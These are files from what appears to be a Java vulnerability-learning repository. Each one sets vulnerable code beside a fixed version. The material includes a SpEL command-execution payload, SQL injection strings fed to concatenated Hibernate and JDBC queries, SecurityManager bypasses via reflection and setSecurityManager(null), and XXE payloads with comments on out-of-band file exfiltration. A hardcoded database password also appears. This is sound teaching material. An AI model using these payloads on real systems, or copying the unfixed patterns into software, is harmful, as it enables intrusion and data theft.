-------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class Student { 4 | String name; 5 | School school; 6 | 7 | public Student(){ 8 | 9 | } 10 | 11 | public void takingClasses(String className){ 12 | System.out.println(this.getName() + "正在上" + className + "课..."); 13 | } 14 | 15 | public Student(String name, School school) { 16 | this.name = name; 17 | this.school = school; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public School getSchool() { 29 | return school; 30 | } 31 | 32 | public void setSchool(School school) { 33 | this.school = school; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/spel/SpelTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.spel; 2 | 3 | import org.springframework.expression.EvaluationContext; 4 | import org.springframework.expression.Expression; 5 | import org.springframework.expression.ExpressionParser; 6 | import org.springframework.expression.spel.standard.SpelExpressionParser; 7 | import org.springframework.expression.spel.support.StandardEvaluationContext; 8 | 9 | /** 10 | * 参考:https://www.freebuf.com/vuls/197008.html 11 | * */ 12 | public class SpelTest { 13 | 14 | public static void main(String[] args) { 15 | new SpelTest().exp(); 16 | } 17 | 18 | public void exp(){ 19 | // 1.创建解析器:SpEL 使用 ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现; 20 | ExpressionParser parser = new SpelExpressionParser(); 21 | // 2.解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象。 22 | Expression expression = parser.parseExpression("T(java.lang.Runtime).getRuntime().exec(\"calc\")"); 23 | // 3.构造上下文:准备比如变量定义等等表达式需要的上下文数据。 24 | EvaluationContext context = new StandardEvaluationContext(); 25 | // 4.求值:通过 Expression 接口的 getValue 方法根据上下文获得表达式值。 26 | Object value = expression.getValue(context); 27 | System.out.println(value); 28 | } 29 | } -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.hibernate; 2 | 3 | import com.r17a.commonvuln.injection.sqli.hibernate.utils.HibernateUtils; 4 | import com.r17a.commonvuln.injection.sqli.hibernate.pojo.User; 5 | import org.hibernate.Session; 6 | import org.hibernate.query.NativeQuery; 7 | import org.hibernate.query.Query; 8 | 9 | import java.util.List; 10 | 11 | public class HibernateSqli { 12 | public static void main(String[] args) { 13 | HibernateSqli hibernateSqli = new HibernateSqli(); 14 | hibernateSqli.getUserByName("lisi' and user()='root@localhost"); 15 | hibernateSqli.getUserByNamePrepare("lisi"); 16 | } 17 | 18 | public void getUserByName(String name){ 19 | Session session = HibernateUtils.getSession(); 20 | Query query = session.createQuery("from User where name = '" + name + "'", User.class); 21 | User user = query.getSingleResult(); 22 | System.out.println(user.getId() + "-" + user.getName() + "-" + user.getDate()); 23 | session.close(); 24 | } 25 | 26 | public void getUserByNamePrepare(String name){ 27 | Session session = HibernateUtils.getSession(); 28 | Query query = session.createQuery("from User where name = :name", User.class); 29 | query.setParameter("name",name); 30 | User user = query.getSingleResult(); 31 | System.out.println(user.getId() + "-" + user.getName() + "-" + user.getDate()); 32 | session.close(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.hibernate.pojo; 2 | 3 | public class User { 4 | private String id; 5 | private String name; 6 | private String password; 7 | private String date; 8 | 9 | public User(){ 10 | } 11 | 12 | public String getId() { 13 | return id; 14 | } 15 | 16 | public void setId(String id) { 17 | this.id = id; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public String getPassword() { 29 | return password; 30 | } 31 | 32 | public void setPassword(String password) { 33 | this.password = password; 34 | } 35 | 36 | public String getDate() { 37 | return date; 38 | } 39 | 40 | public void setDate(String date) { 41 | this.date = date; 42 | } 43 | } 44 | 45 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.hibernate.utils; 2 | 3 | 4 | import org.hibernate.HibernateException; 5 | import org.hibernate.Session; 6 | import org.hibernate.SessionFactory; 7 | import org.hibernate.boot.registry.StandardServiceRegistryBuilder; 8 | import org.hibernate.cfg.Configuration; 9 | import org.hibernate.service.ServiceRegistry; 10 | 11 | import com.r17a.commonvuln.injection.sqli.hibernate.pojo.User; 12 | 13 | 14 | public class HibernateUtils { 15 | 16 | private static SessionFactory factory; 17 | private static ServiceRegistry serviceRegistry; 18 | static{ 19 | try{ 20 | Configuration configuration = new Configuration().configure(); 21 | 22 | configuration.addClass(User.class); 23 | 24 | serviceRegistry = new StandardServiceRegistryBuilder() 25 | .applySettings(configuration.getProperties()).build(); 26 | factory = configuration.buildSessionFactory(serviceRegistry); 27 | }catch(HibernateException e){ 28 | e.printStackTrace(); 29 | } 30 | } 31 | //返回会话工厂对象 32 | public static SessionFactory getSessionFactory(){ 33 | return factory; 34 | } 35 | //返回一个会话对象 36 | public static Session getSession(){ 37 | Session session = null; 38 | if(factory!=null) { 39 | session = factory.openSession(); 40 | } 41 | return session; 42 | } 43 | //关闭指定的会话对象 44 | public static void closeSession(Session session){ 45 | if(session!=null){ 46 | if(session.isOpen()) { 47 | session.close(); 48 | } 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.jdbc; 2 | 3 | import java.sql.*; 4 | 5 | /** 6 | * TODO 设置用户名密码和Mysql地址 7 | * */ 8 | public class JdbcSqli { 9 | public static void main(String[] args) throws Exception { 10 | JdbcSqli jdbcSqli = new JdbcSqli(); 11 | jdbcSqli.selectPoc("1 and 1=2 union select * from user"); 12 | jdbcSqli.selectFix("2' and 1=2 union select * from user where '1'='1"); 13 | } 14 | 15 | public void selectPoc(String value) throws Exception { 16 | final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8&useSSL=true"; 17 | final String username = "root"; 18 | final String password = "1qazXSW@3edc"; 19 | 20 | // 加载驱动 21 | Class.forName("com.mysql.cj.jdbc.Driver"); 22 | // 连接数据库 23 | Connection connection = DriverManager.getConnection(url, username, password); 24 | //创建Statement,编写sql语句 25 | Statement statement = connection.createStatement(); 26 | String sql = "select * from user where id=" + value; 27 | ResultSet resultSet = statement.executeQuery(sql); 28 | while (resultSet.next()) { 29 | System.out.println("id:" + resultSet.getObject("id")); 30 | System.out.println("name:" + resultSet.getObject("name")); 31 | System.out.println("password:" + resultSet.getObject("password")); 32 | System.out.println("date:" + resultSet.getObject("date")); 33 | } 34 | 35 | resultSet.close(); 36 | statement.close(); 37 | connection.close(); 38 | } 39 | 40 | public void selectFix(String value) throws Exception { 41 | final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8"; 42 | final String username = "root"; 43 | final String password = "1qazXSW@3edc"; 44 | 45 | // 加载驱动 46 | Class.forName("com.mysql.cj.jdbc.Driver"); 47 | // 连接数据库 48 | Connection connection = DriverManager.getConnection(url, username, password); 49 | //创建Statement,编写sql语句 50 | String sql = "select * from user where id=?"; 51 | PreparedStatement preparedStatement = connection.prepareStatement(sql); 52 | preparedStatement.setString(1,value); 53 | ResultSet resultSet = preparedStatement.executeQuery(); 54 | while (resultSet.next()) { 55 | System.out.println("id:" + resultSet.getObject("id")); 56 | System.out.println("name:" + resultSet.getObject("name")); 57 | System.out.println("password:" + resultSet.getObject("password")); 58 | System.out.println("date:" + resultSet.getObject("date")); 59 | } 60 | preparedStatement.close(); 61 | connection.close(); 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.dao; 2 | 3 | import com.r17a.commonvuln.injection.sqli.mybatis.pojo.User; 4 | 5 | public interface UserMapper { 6 | User getById(String id); 7 | 8 | User getByIdPrepare(String id); 9 | } 10 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 10 | 13 | 16 | 19 | 22 | 23 | 24 | 25 | 28 | 34 | 37 | 49 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.pojo; 2 | 3 | public class User { 4 | private String id; 5 | private String name; 6 | private String password; 7 | private String date; 8 | 9 | public User(){ 10 | } 11 | 12 | public String getId() { 13 | return id; 14 | } 15 | 16 | public void setId(String id) { 17 | this.id = id; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public String getPassword() { 29 | return password; 30 | } 31 | 32 | public void setPassword(String password) { 33 | this.password = password; 34 | } 35 | 36 | public String getDate() { 37 | return date; 38 | } 39 | 40 | public void setDate(String date) { 41 | this.date = date; 42 | } 43 | } 44 | 45 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.utils; 2 | 3 | import org.apache.ibatis.io.Resources; 4 | import org.apache.ibatis.session.SqlSession; 5 | import org.apache.ibatis.session.SqlSessionFactory; 6 | import org.apache.ibatis.session.SqlSessionFactoryBuilder; 7 | 8 | import java.io.IOException; 9 | import java.io.InputStream; 10 | 11 | public class MybatisUtils { 12 | private static SqlSessionFactory sqlSessionFactory; 13 | 14 | static { 15 | try { 16 | String resource = "mybatis-config.xml"; 17 | InputStream inputStream = Resources.getResourceAsStream(resource); 18 | sqlSessionFactory = new SqlSessionFactoryBuilder().build(inputStream); 19 | } catch (IOException e) { 20 | e.printStackTrace(); 21 | } 22 | 23 | } 24 | 25 | public static SqlSession getSqlSession() { 26 | SqlSession sqlSession = sqlSessionFactory.openSession(); 27 | return sqlSession; 28 | } 29 | 30 | } 31 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.securitymanager; 2 | 3 | import java.lang.reflect.Method; 4 | import java.util.Map; 5 | 6 | public class BypassByReflection { 7 | public static void main(String[] args) { 8 | 9 | //TODO compile and run with: -Djava.security.manager -Djava.security.policy==bypass-by-reflection.policy 10 | // bypass-by-reflection.policy: 11 | // grant { 12 | // permission java.lang.reflect.ReflectPermission "suppressAccessChecks"; 13 | // permission java.lang.RuntimePermission "accessDeclaredMembers"; 14 | // }; 15 | 16 | // executeCommandWithReflection("calc"); 17 | exec("calc"); 18 | } 19 | 20 | public static void exec(String command) { 21 | try { 22 | Runtime.getRuntime().exec(command); 23 | } catch (Exception e) { 24 | e.printStackTrace(); 25 | } 26 | } 27 | 28 | public static void executeCommandWithReflection(String command) { 29 | try { 30 | Class clz = Class.forName("java.lang.ProcessImpl"); 31 | Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); 32 | method.setAccessible(true); 33 | method.invoke(clz, new String[]{command}, null, null, null, false); 34 | } catch (Exception e) { 35 | e.printStackTrace(); 36 | } 37 | } 38 | 39 | } -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.securitymanager; 2 | 3 | 4 | import java.io.IOException; 5 | 6 | /** 7 | * 通过授权RuntimePermission为setSecurityManager和设置SecurityManager为null,绕过check 8 | */ 9 | public class SetSecurityManagerNullBypass { 10 | public static void main(String[] args) { 11 | new SetSecurityManagerNullBypass().exec(); 12 | } 13 | 14 | private void exec() { 15 | //TODO 编译运行 -Djava.security.manager -Djava.security.policy==your.policy 16 | // grant { 17 | // permission java.lang.RuntimePermission "setSecurityManager"; 18 | // }; 19 | 20 | // 设置SecurityManager为null 绕过check 21 | System.setSecurityManager(null); 22 | // 执行命令 23 | Runtime runtime = Runtime.getRuntime(); 24 | try { 25 | runtime.exec("calc"); 26 | } catch (IOException e) { 27 | e.printStackTrace(); 28 | } 29 | } 30 | 31 | } 32 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.securitymanager.policy; 2 | 3 | import java.io.*; 4 | 5 | public class CreatePolicy { 6 | public static void main(String[] args) { 7 | CreatePolicy createPolicy = new CreatePolicy(); 8 | createPolicy.createFilePermission("E:/myTest.policy", "E:\\test.txt"); 9 | } 10 | 11 | /** 12 | * 在指定文件下生成一个policy文件,允许某个文件的读写 13 | * 14 | * @param policyFileName 指定配置文件保存位置 15 | * @param allowFileName 指定可读写文件 16 | */ 17 | public void createFilePermission(String policyFileName, String allowFileName) { 18 | allowFileName = allowFileName.replace("\\", "/"); 19 | String policyContent = "grant {\n" + 20 | " permission java.io.FilePermission \"" + allowFileName + "\",\"read,write\";\n" + 21 | "};"; 22 | try { 23 | FileWriter fileWriter = new FileWriter(policyFileName); 24 | fileWriter.write(policyContent); 25 | fileWriter.flush(); 26 | fileWriter.close(); 27 | } catch (IOException e) { 28 | e.printStackTrace(); 29 | } 30 | } 31 | 32 | /** 33 | * 根据授权内容在指定文件下生成一个policy文件 34 | * 35 | * @param permission 指定授权内容 36 | * @param policyFileName 指定配置文件保存位置 37 | */ 38 | public void createAnyPermission(String permission, String policyFileName){ 39 | String policyContent = "grant {\n " + permission +"\n" +"\n};"; 40 | try { 41 | FileWriter fileWriter = new FileWriter(policyFileName); 42 | fileWriter.write(permission); 43 | fileWriter.flush(); 44 | fileWriter.close(); 45 | } catch (IOException e) { 46 | e.printStackTrace(); 47 | } 48 | } 49 | 50 | } 51 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import org.w3c.dom.Document; 4 | 5 | import javax.xml.XMLConstants; 6 | import javax.xml.parsers.DocumentBuilder; 7 | import javax.xml.parsers.DocumentBuilderFactory; 8 | import java.io.ByteArrayInputStream; 9 | 10 | public class DocumentBuilderXXE extends XXE{ 11 | 12 | public static void main(String[] args) { 13 | new DocumentBuilderXXE().test(); 14 | } 15 | 16 | 17 | void readNoFixXxe() { 18 | try { 19 | DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance(); 20 | DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder(); 21 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 22 | Document d = documentBuilder.parse(byteArrayInputStream); 23 | System.out.println(d.getDocumentElement().getTextContent()); 24 | } catch (Exception e) { 25 | e.printStackTrace(); 26 | } 27 | 28 | } 29 | 30 | void readWithFixXxe() { 31 | try { 32 | DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance(); 33 | documentBuilderFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 34 | documentBuilderFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); 35 | documentBuilderFactory.setAttribute(XMLConstants.FEATURE_SECURE_PROCESSING, true); 36 | DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder(); 37 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 38 | Document d = documentBuilder.parse(byteArrayInputStream); 39 | System.out.println(d.getDocumentElement().getTextContent()); 40 | } catch (Exception e) { 41 | e.printStackTrace(); 42 | } 43 | 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | /** 4 | * from https://github.com/threedr3am/learnjavabug/tree/master/xxe/src/main/java/com/threedr3am/bug/xxe 5 | */ 6 | public interface Payloads { 7 | 8 | /** 9 | * 有回显的payload xml 10 | *

11 | * 读取文件内容 12 | */ 13 | String FEEDBACK = 14 | "" 15 | + "" 17 | + " ]>" 18 | + "&xxe;"; 19 | 20 | /** 21 | * 有回显的payload xml,带了xsl 22 | *

23 | * 读取文件内容 24 | */ 25 | String FEEDBACK_XSL = 26 | "\n" + 27 | "\n" + 29 | "]>\n" + 30 | "\n" + 31 | "\n" + 32 | " &file;\n" + 33 | ""; 34 | 35 | /** 36 | * 没有回显,只能带出去的payload xml,读取文件单行 37 | *

38 | * 读取/tmp/aaa文件内容 39 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 40 | * "> 41 | * 监听23232端口 42 | */ 43 | String NO_FEEDBACK_SINGLE_LINE = 44 | "" 45 | + "" 47 | + " " 48 | + " %remote;%all;" 49 | + "]>" 50 | + "&send;"; 51 | 52 | /** 53 | * 没有回显,只能带出去的payload xml,读取文件多行 54 | *

55 | * 读取/tmp/aaa文件内容 56 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 57 | * "> 58 | * 监听23232端口 59 | */ 60 | String NO_FEEDBACK_MULT_LINE = 61 | "" 62 | + "" 64 | + " " 65 | + " %remote;%all;" 66 | + "]>" 67 | + "&send;"; 68 | } 69 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.util.List; 5 | 6 | import org.jdom.Content; 7 | import org.jdom.Document; 8 | import org.jdom.Element; 9 | import org.jdom.input.SAXBuilder; 10 | 11 | public class SAXBuilderXXE extends XXE { 12 | public static void main(String[] args) { 13 | new SAXBuilderXXE().test(); 14 | } 15 | 16 | void readNoFixXxe() { 17 | try { 18 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 19 | SAXBuilder saxBuilder = new SAXBuilder(); 20 | Document document = saxBuilder.build(byteArrayInputStream); 21 | Element element = document.getRootElement(); 22 | List contents = element.getContent(); 23 | for (Content content : contents) { 24 | System.out.println(content.getValue()); 25 | } 26 | } catch (Exception e) { 27 | e.printStackTrace(); 28 | } 29 | 30 | } 31 | 32 | void readWithFixXxe() { 33 | try { 34 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 35 | SAXBuilder saxBuilder = new SAXBuilder(); 36 | saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 37 | saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false); 38 | saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 39 | saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 40 | Document document = saxBuilder.build(byteArrayInputStream); 41 | Element element = document.getRootElement(); 42 | List contents = element.getContent(); 43 | for (Content content : contents) { 44 | System.out.println(content.getValue()); 45 | } 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import org.dom4j.Document; 4 | import org.dom4j.io.SAXReader; 5 | import org.dom4j.io.XMLWriter; 6 | 7 | import java.io.ByteArrayInputStream; 8 | 9 | public class SAXReadXXE extends XXE { 10 | public static void main(String[] args) { 11 | new SAXReadXXE().test(); 12 | } 13 | 14 | @Override 15 | void readNoFixXxe() { 16 | try { 17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 18 | SAXReader saxReader = new SAXReader(); 19 | Document doc = saxReader.read(byteArrayInputStream); 20 | XMLWriter xmlWriter = new XMLWriter(System.out); 21 | xmlWriter.write(doc); 22 | } catch (Exception e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | 27 | @Override 28 | void readWithFixXxe() { 29 | try { 30 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 31 | SAXReader saxReader = new SAXReader(); 32 | saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 33 | saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false); 34 | saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 35 | saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 36 | Document doc = saxReader.read(byteArrayInputStream); 37 | XMLWriter xmlWriter = new XMLWriter(System.out); 38 | xmlWriter.write(doc); 39 | } catch (Exception e) { 40 | e.printStackTrace(); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | 4 | import javax.xml.XMLConstants; 5 | import javax.xml.transform.Result; 6 | import javax.xml.transform.sax.SAXTransformerFactory; 7 | import javax.xml.transform.sax.TransformerHandler; 8 | import javax.xml.transform.stream.StreamResult; 9 | import javax.xml.transform.stream.StreamSource; 10 | import java.io.ByteArrayInputStream; 11 | 12 | public class SAXTransformerFactoryXXE extends XXE { 13 | public static void main(String[] args) { 14 | new SAXTransformerFactoryXXE().test(); 15 | } 16 | 17 | @Override 18 | void readNoFixXxe() { 19 | try { 20 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes()); 21 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 22 | StreamSource source = new StreamSource(byteArrayInputStream); 23 | TransformerHandler transformerHandler = sf.newTransformerHandler(source); 24 | // 创建Result对象,并通过transformerHandler将目的流与其关联 25 | Result result = new StreamResult(System.out); 26 | transformerHandler.setResult(result); 27 | } catch (Exception e) { 28 | e.printStackTrace(); 29 | } 30 | } 31 | 32 | @Override 33 | void readWithFixXxe() { 34 | try { 35 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK_XSL.getBytes()); 36 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 37 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 38 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 39 | StreamSource source = new StreamSource(byteArrayInputStream); 40 | TransformerHandler transformerHandler = sf.newTransformerHandler(source); 41 | // 创建Result对象,并通过transformerHandler将目的流与其关联 42 | Result result = new StreamResult(System.out); 43 | transformerHandler.setResult(result); 44 | } catch (Exception e) { 45 | e.printStackTrace(); 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/TransformerFactoryXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import javax.xml.XMLConstants; 4 | import javax.xml.transform.TransformerException; 5 | import javax.xml.transform.TransformerFactory; 6 | import javax.xml.transform.stream.StreamResult; 7 | import javax.xml.transform.stream.StreamSource; 8 | import java.io.ByteArrayInputStream; 9 | 10 | public class TransformerFactoryXXE extends XXE { 11 | public static void main(String[] args) { 12 | new TransformerFactoryXXE().test(); 13 | } 14 | @Override 15 | void readNoFixXxe() { 16 | try { 17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 18 | TransformerFactory tf = TransformerFactory.newInstance(); 19 | StreamSource source = new StreamSource(byteArrayInputStream); 20 | tf.newTransformer().transform(source, new StreamResult(System.out)); 21 | } catch (TransformerException e) { 22 | e.printStackTrace(); 23 | } 24 | } 25 | 26 | @Override 27 | void readWithFixXxe() { 28 | try { 29 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 30 | TransformerFactory tf = TransformerFactory.newInstance(); 31 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 32 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 33 | StreamSource source = new StreamSource(byteArrayInputStream); 34 | tf.newTransformer().transform(source, new StreamResult(System.out)); 35 | } catch (TransformerException e) { 36 | e.printStackTrace(); 37 | } 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/XXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | abstract class XXE { 4 | abstract void readNoFixXxe(); 5 | abstract void readWithFixXxe(); 6 | 7 | void test(){ 8 | System.out.println("\n---------This is result with xxe!-------------"); 9 | this.readNoFixXxe(); 10 | System.out.println("\n---------This is result fixing xxe patch!-------------"); 11 | this.readWithFixXxe(); 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /owasp/src/main/resources/hibernate.cfg.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | thread 10 | 11 | com.mysql.cj.jdbc.Driver 12 | jdbc:mysql://localhost:3306/users?serverTimezone=UTC 13 | root 14 | 1qazXSW@3edc 15 | 16 | 17 | true 18 | 19 | true 20 | 21 | 22 | org.hibernate.dialect.MySQLDialect 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /owasp/src/main/resources/imgs/111.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/imgs/111.png -------------------------------------------------------------------------------- /owasp/src/main/resources/mybatis-config.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /owasp/src/main/resources/tmp/tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/src/main/resources/tmp/tmp -------------------------------------------------------------------------------- /owasp/src/main/resources/user_db.sql: -------------------------------------------------------------------------------- 1 | create database users; 2 | use users; 3 | create table user 4 | ( 5 | id INT(20) NOT NULL, 6 | name VARCHAR(20), 7 | password VARCHAR(20), 8 | date DATE, 9 | PRIMARY KEY (id) 10 | ) engine = innodb 11 | default charset = 'utf8'; 12 | insert into user values(1,'zhansan','111','2021-01-01'); 13 | insert into user values(2,'lisi','111','2021-01-01'); 14 | insert into user values(3,'wangwu','111','2021-01-01'); 15 | insert into user values(4,'wangqiang','111','2021-01-01'); -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/cors/Cors.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/cors/Cors.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileDelete.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUnzip.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/file/FileUploadOrDownload.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/owasp/target/classes/com/r17a/commonvuln/injection/command/ProcessCmdInject.class -------------------------------------------------------------------------------- /owasp/target/classes/com/r17a/commonvuln/injection/command/RuntimeCmdInject.class: -------------------------------------------------------------------------------- 